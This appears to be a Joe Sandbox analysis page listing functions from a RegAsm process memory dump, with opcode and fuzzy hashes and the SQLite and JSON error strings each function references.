Associated: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$API called with NULL prepared statement$API called with finalized prepared statement$bind on a busy prepared statement: [%s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
API String ID: 0-3679126755
Opcode ID: 3ba557d2a99c16c5276dd4562dd54f1d139437e6440f4e44c827f5a005a4bc5b
Instruction ID: 409a5c739199db154147eea41365d80c8995cb6a06a2ba05453afbe364b76cd2
Opcode Fuzzy Hash: 3ba557d2a99c16c5276dd4562dd54f1d139437e6440f4e44c827f5a005a4bc5b
Instruction Fuzzy Hash: 3A4102706106009BE710CF28EC85FD676AAAF40305F4D4628F599DB7C1EB64E5A0C792

Uniqueness

Uniqueness Score: -1.00%

Function 19D4ECF0 Relevance: 19.6, APIs: 9, Strings: 2, Instructions: 335COMMON

Download Yara Rule

Strings

content, xrefs: 19D4EFDF
docsize, xrefs: 19D4F020

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID: content$docsize
API String ID: 0-1024698521
Opcode ID: 0ffca54230cff882de2854f017fee22100a35fba1a0bdbfd22172d0eb5c57b38
Instruction ID: 6f872709df45fb92047c7bd2c147884e09f6b67a4df7225faead1485b41df1c5
Opcode Fuzzy Hash: 0ffca54230cff882de2854f017fee22100a35fba1a0bdbfd22172d0eb5c57b38
Instruction Fuzzy Hash: 04C14371908312ABD710CF28CC85B6BB3E4EF80350F684568FD84ABA90D771F845CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 19CD5470 Relevance: 19.5, APIs: 8, Strings: 3, Instructions: 225COMMON

Download Yara Rule

Strings

%!0.15g, xrefs: 19CD54D2
JSON cannot hold BLOB values, xrefs: 19CD5697
%lld, xrefs: 19CD550D

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID: %!0.15g$%lld$JSON cannot hold BLOB values
API String ID: 0-1047910854
Opcode ID: d15e030a85cc9d1f873738eece02848b7612e2e5837137f0ed19cd5739f8df11
Instruction ID: fae1e1dd16ad945b461dfbc2305c05c98479585dcf6240d83a3a415e5ea38feb
Opcode Fuzzy Hash: d15e030a85cc9d1f873738eece02848b7612e2e5837137f0ed19cd5739f8df11
Instruction Fuzzy Hash: 5D51BA7A5003406BE311AA18FC41FBA37E6DF92336F1C425DFAC1462C6EF27A55242E2

Uniqueness

Uniqueness Score: -1.00%

Function 19C52B70 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 183COMMON

Download Yara Rule

Strings

ABLE x, xrefs: 19C52BB6
,schema HIDDEN, xrefs: 19C52CD2
("%s", xrefs: 19C52C4A
,arg HIDDEN, xrefs: 19C52C7A
%c"%s", xrefs: 19C52C1B

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID: %c"%s"$("%s"$,arg HIDDEN$,schema HIDDEN$ABLE x
API String ID: 0-1763475469
Opcode ID: 9cafa7672579c05e4aca68013e72c6344aeef2b120b13fb4daca918f42731300
Instruction ID: a9f38a17e8d0ae02ddd7c6aaa7ceb4a1062c6895b5b74bbe07a42202c48e6177
Opcode Fuzzy Hash: 9cafa7672579c05e4aca68013e72c6344aeef2b120b13fb4daca918f42731300
Instruction Fuzzy Hash: 9D71D4759083858FE314CF24D844B5ABBE1FF88304F488A6EF8DA97241E735E644CB96

Uniqueness

Uniqueness Score: -1.00%

Function 19CCAA40 Relevance: 17.8, APIs: 5, Strings: 5, Instructions: 334COMMON

Download Yara Rule

Strings

%s at line %d of [%.10s], xrefs: 19CCAAC7, 19CCAD91
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 19CCAAB8, 19CCAD82
API called with finalized prepared statement, xrefs: 19CCAA9C, 19CCAD76
misuse, xrefs: 19CCAAC2, 19CCAD8C
API called with NULL prepared statement, xrefs: 19CCAA87

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$API called with NULL prepared statement$API called with finalized prepared statement$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
API String ID: 0-860711957
Opcode ID: c2a91fae17bb91edfa6d008765016ffb0e4757f7366533644d548765df940201
Instruction ID: 76620bcc21656a718e0e9dc5897662fc8a5ea9c1b3f06726499379dfb8f4e202
Opcode Fuzzy Hash: c2a91fae17bb91edfa6d008765016ffb0e4757f7366533644d548765df940201
Instruction Fuzzy Hash: C5B114B6A003459BE7108F29FC49B577BE8AF40356F0C453CE9DA872C1EB76E54487A2

Uniqueness

Uniqueness Score: -1.00%

Function 19C4A170 Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 286COMMON

Download Yara Rule

Strings

malformed JSON, xrefs: 19C4A283
JSON path error near '%q', xrefs: 19C4A3D7

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID: JSON path error near '%q'$malformed JSON
API String ID: 0-560895927
Opcode ID: 74c113c6e91dab70175814367691a339e6f3990506e1796d541c2a33af5e5ca3
Instruction ID: 4f0f7178b96a5087e05d9f0fe3d1a3d64c4bf2a889eb87fd24f151d7d56dab67
Opcode Fuzzy Hash: 74c113c6e91dab70175814367691a339e6f3990506e1796d541c2a33af5e5ca3
Instruction Fuzzy Hash: C1A12BB6A003418FD724CF29E845B6AB7E5EF84314F2C952DE4C98B282E736E545CB91

Uniqueness

Uniqueness Score: -1.00%

Function 19C53D20 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 223COMMON

Download Yara Rule

Strings

PRAGMA , xrefs: 19C53DC5
%Q., xrefs: 19C53E11
=%Q, xrefs: 19C53E7F

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID: %Q.$=%Q$PRAGMA
API String ID: 0-2099833060
Opcode ID: a8510ce8ee81d3ad7f4dbe184b6e58377200dd2d3ccaa0eca23fe7f8cacf6589
Instruction ID: f1e1bf4e9110c9aecec56f751b124879373f8dac374713c4b584c6611b1c76af
Opcode Fuzzy Hash: a8510ce8ee81d3ad7f4dbe184b6e58377200dd2d3ccaa0eca23fe7f8cacf6589
Instruction Fuzzy Hash: 4B710372A04201DBE700DF24EC85B5BB7E8AF84344F4C8569F8869B281D775E914CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 19C3B980 Relevance: 16.7, APIs: 11, Instructions: 244COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c5642ff5aa281f45b838e6b0e6add7b6d2f81b2a0bdaef3fd97948ffb3270185
Instruction ID: 11bdafb6c500b9a8d15f37c6587d304a38a1cab610c5229ec99146164f04ce27
Opcode Fuzzy Hash: c5642ff5aa281f45b838e6b0e6add7b6d2f81b2a0bdaef3fd97948ffb3270185
Instruction Fuzzy Hash: 8F8144768083829BD7108F20F84173ABBA0AF8121AFCC4579E8D5172D6DB35EB95C7D2

Uniqueness

Uniqueness Score: -1.00%

Function 19C7F600 Relevance: 16.7, APIs: 11, Instructions: 199COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a70c7127cf5330d89c7d45b3115e672d80e76ffd15e8db3879d2d7a1d690e5da
Instruction ID: 3ed30457e4538eb0db0fdbe7b3e4868bf65de285e7c81f398741b85a6c700ea7
Opcode Fuzzy Hash: a70c7127cf5330d89c7d45b3115e672d80e76ffd15e8db3879d2d7a1d690e5da
Instruction Fuzzy Hash: B251B376A043066FE704DF18ECC1B6BB7E8EF84714F48052DF98497241EB25AA5987A2

Uniqueness

Uniqueness Score: -1.00%

Function 19CA1940 Relevance: 16.1, APIs: 5, Strings: 4, Instructions: 345COMMON

Download Yara Rule

Strings

block, xrefs: 19CA1A90
%s at line %d of [%.10s], xrefs: 19CA1B26
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 19CA1B17
misuse, xrefs: 19CA1B21

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$block$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
API String ID: 0-4016964285
Opcode ID: b640250484582463685b836d1d0c97b122c42c6f378bfce91bd450d3ecd5f9e6
Instruction ID: 50d4c47cd2990fcc4d25a1dfb5c47394653a179e8f71cdfeda5f2599c3882b71
Opcode Fuzzy Hash: b640250484582463685b836d1d0c97b122c42c6f378bfce91bd450d3ecd5f9e6
Instruction Fuzzy Hash: E7C1D2B1D00252DFDB11DF25E884A5B77A8BF84394F088569FC899B381F735DA14CB92

Uniqueness

Uniqueness Score: -1.00%

Function 19C4FED0 Relevance: 16.0, APIs: 3, Strings: 6, Instructions: 257COMMON

Download Yara Rule

Strings

unknown error, xrefs: 19C5003E
abort due to ROLLBACK, xrefs: 19C50068
%llu, xrefs: 19C4FF3C
no more rows available, xrefs: 19C5006F
%llu, xrefs: 19C4FFF7
another row available, xrefs: 19C50076, 19C50081

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID: %llu$%llu$abort due to ROLLBACK$another row available$no more rows available$unknown error
API String ID: 0-1539118790
Opcode ID: f4c58f8d86be8796285e01bf96193bbcc2a85d14b063bd26bed087541a06721b
Instruction ID: 84914d213101a1350155482a0c0654c22afdd1bfd20c24151716bd7bb3a9f3f6
Opcode Fuzzy Hash: f4c58f8d86be8796285e01bf96193bbcc2a85d14b063bd26bed087541a06721b
Instruction Fuzzy Hash: 3891F372B043009BE704DE28E884B9BB7E5BB85314F58452DF88EDB391D736E845CB96

Uniqueness

Uniqueness Score: -1.00%

Function 19D570B0 Relevance: 16.0, APIs: 3, Strings: 6, Instructions: 227COMMON

Download Yara Rule

Strings

%s at line %d of [%.10s], xrefs: 19D5721C
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 19D5720D
API called with finalized prepared statement, xrefs: 19D57201
misuse, xrefs: 19D57217
orphan index, xrefs: 19D572C2
invalid rootpage, xrefs: 19D5715C, 19D5730E

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$API called with finalized prepared statement$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$invalid rootpage$misuse$orphan index
API String ID: 0-165706444
Opcode ID: 8f0c9e1a7d93a8bc89f21a48e317c838398005bbb53463beb9496c9d54ecec52
Instruction ID: 21c0b7552adeca35528f671b5fa433a469b2d648ad1d10247600be07b320a0cc
Opcode Fuzzy Hash: 8f0c9e1a7d93a8bc89f21a48e317c838398005bbb53463beb9496c9d54ecec52
Instruction Fuzzy Hash: AA616CB5A013406BFF118A61EC80F5777B8AF41215F2D9469EC56C6AC2E721F154C7B2

Uniqueness

Uniqueness Score: -1.00%

Function 19C43A50 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 172COMMON

Download Yara Rule

Strings

bad page number, xrefs: 19C43BE3
cannot insert, xrefs: 19C43BF1, 19C43C52
bad page value, xrefs: 19C43BDC
read-only, xrefs: 19C43A71
cannot delete, xrefs: 19C43A82
no such schema, xrefs: 19C43BEA

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID: bad page number$bad page value$cannot delete$cannot insert$no such schema$read-only
API String ID: 0-1499782803
Opcode ID: 19e6e20d175a9296afd05c7c040abb91115008c49fe8b9b00ca5599e1c44be1d
Instruction ID: 4f1d7ab681e4933fa368e38ede643ce1641136ea12f2f3159c4d1bd10b60a619
Opcode Fuzzy Hash: 19e6e20d175a9296afd05c7c040abb91115008c49fe8b9b00ca5599e1c44be1d
Instruction Fuzzy Hash: 1951E376B042409BD7018F24EE86B1B77E8ABD0254F2D4469F889CB3D1E736E945C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 19D5B0E0 Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 117COMMON

Download Yara Rule

Strings

invalid, xrefs: 19D5B13E
%s at line %d of [%.10s], xrefs: 19D5B117
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 19D5B108
API call with %s database connection pointer, xrefs: 19D5B0F9
misuse, xrefs: 19D5B112
NULL, xrefs: 19D5B0F4
unopened, xrefs: 19D5B145

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$API call with %s database connection pointer$NULL$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$invalid$misuse$unopened
API String ID: 0-538076154
Opcode ID: a0e0b4f07c04f3647c8d9432b928ddc9c89e5dff2ce9601326e343c42779a008
Instruction ID: cee5025754595ff7b9621eb4f81f17e8e60493afb9cb6f9ab39dea18ff8430b7
Opcode Fuzzy Hash: a0e0b4f07c04f3647c8d9432b928ddc9c89e5dff2ce9601326e343c42779a008
Instruction Fuzzy Hash: 3A31AD74904344ABFF105A24EC00E9B7BB59F41329F4C0528E8E3E2A81EB78E601CF93

Uniqueness

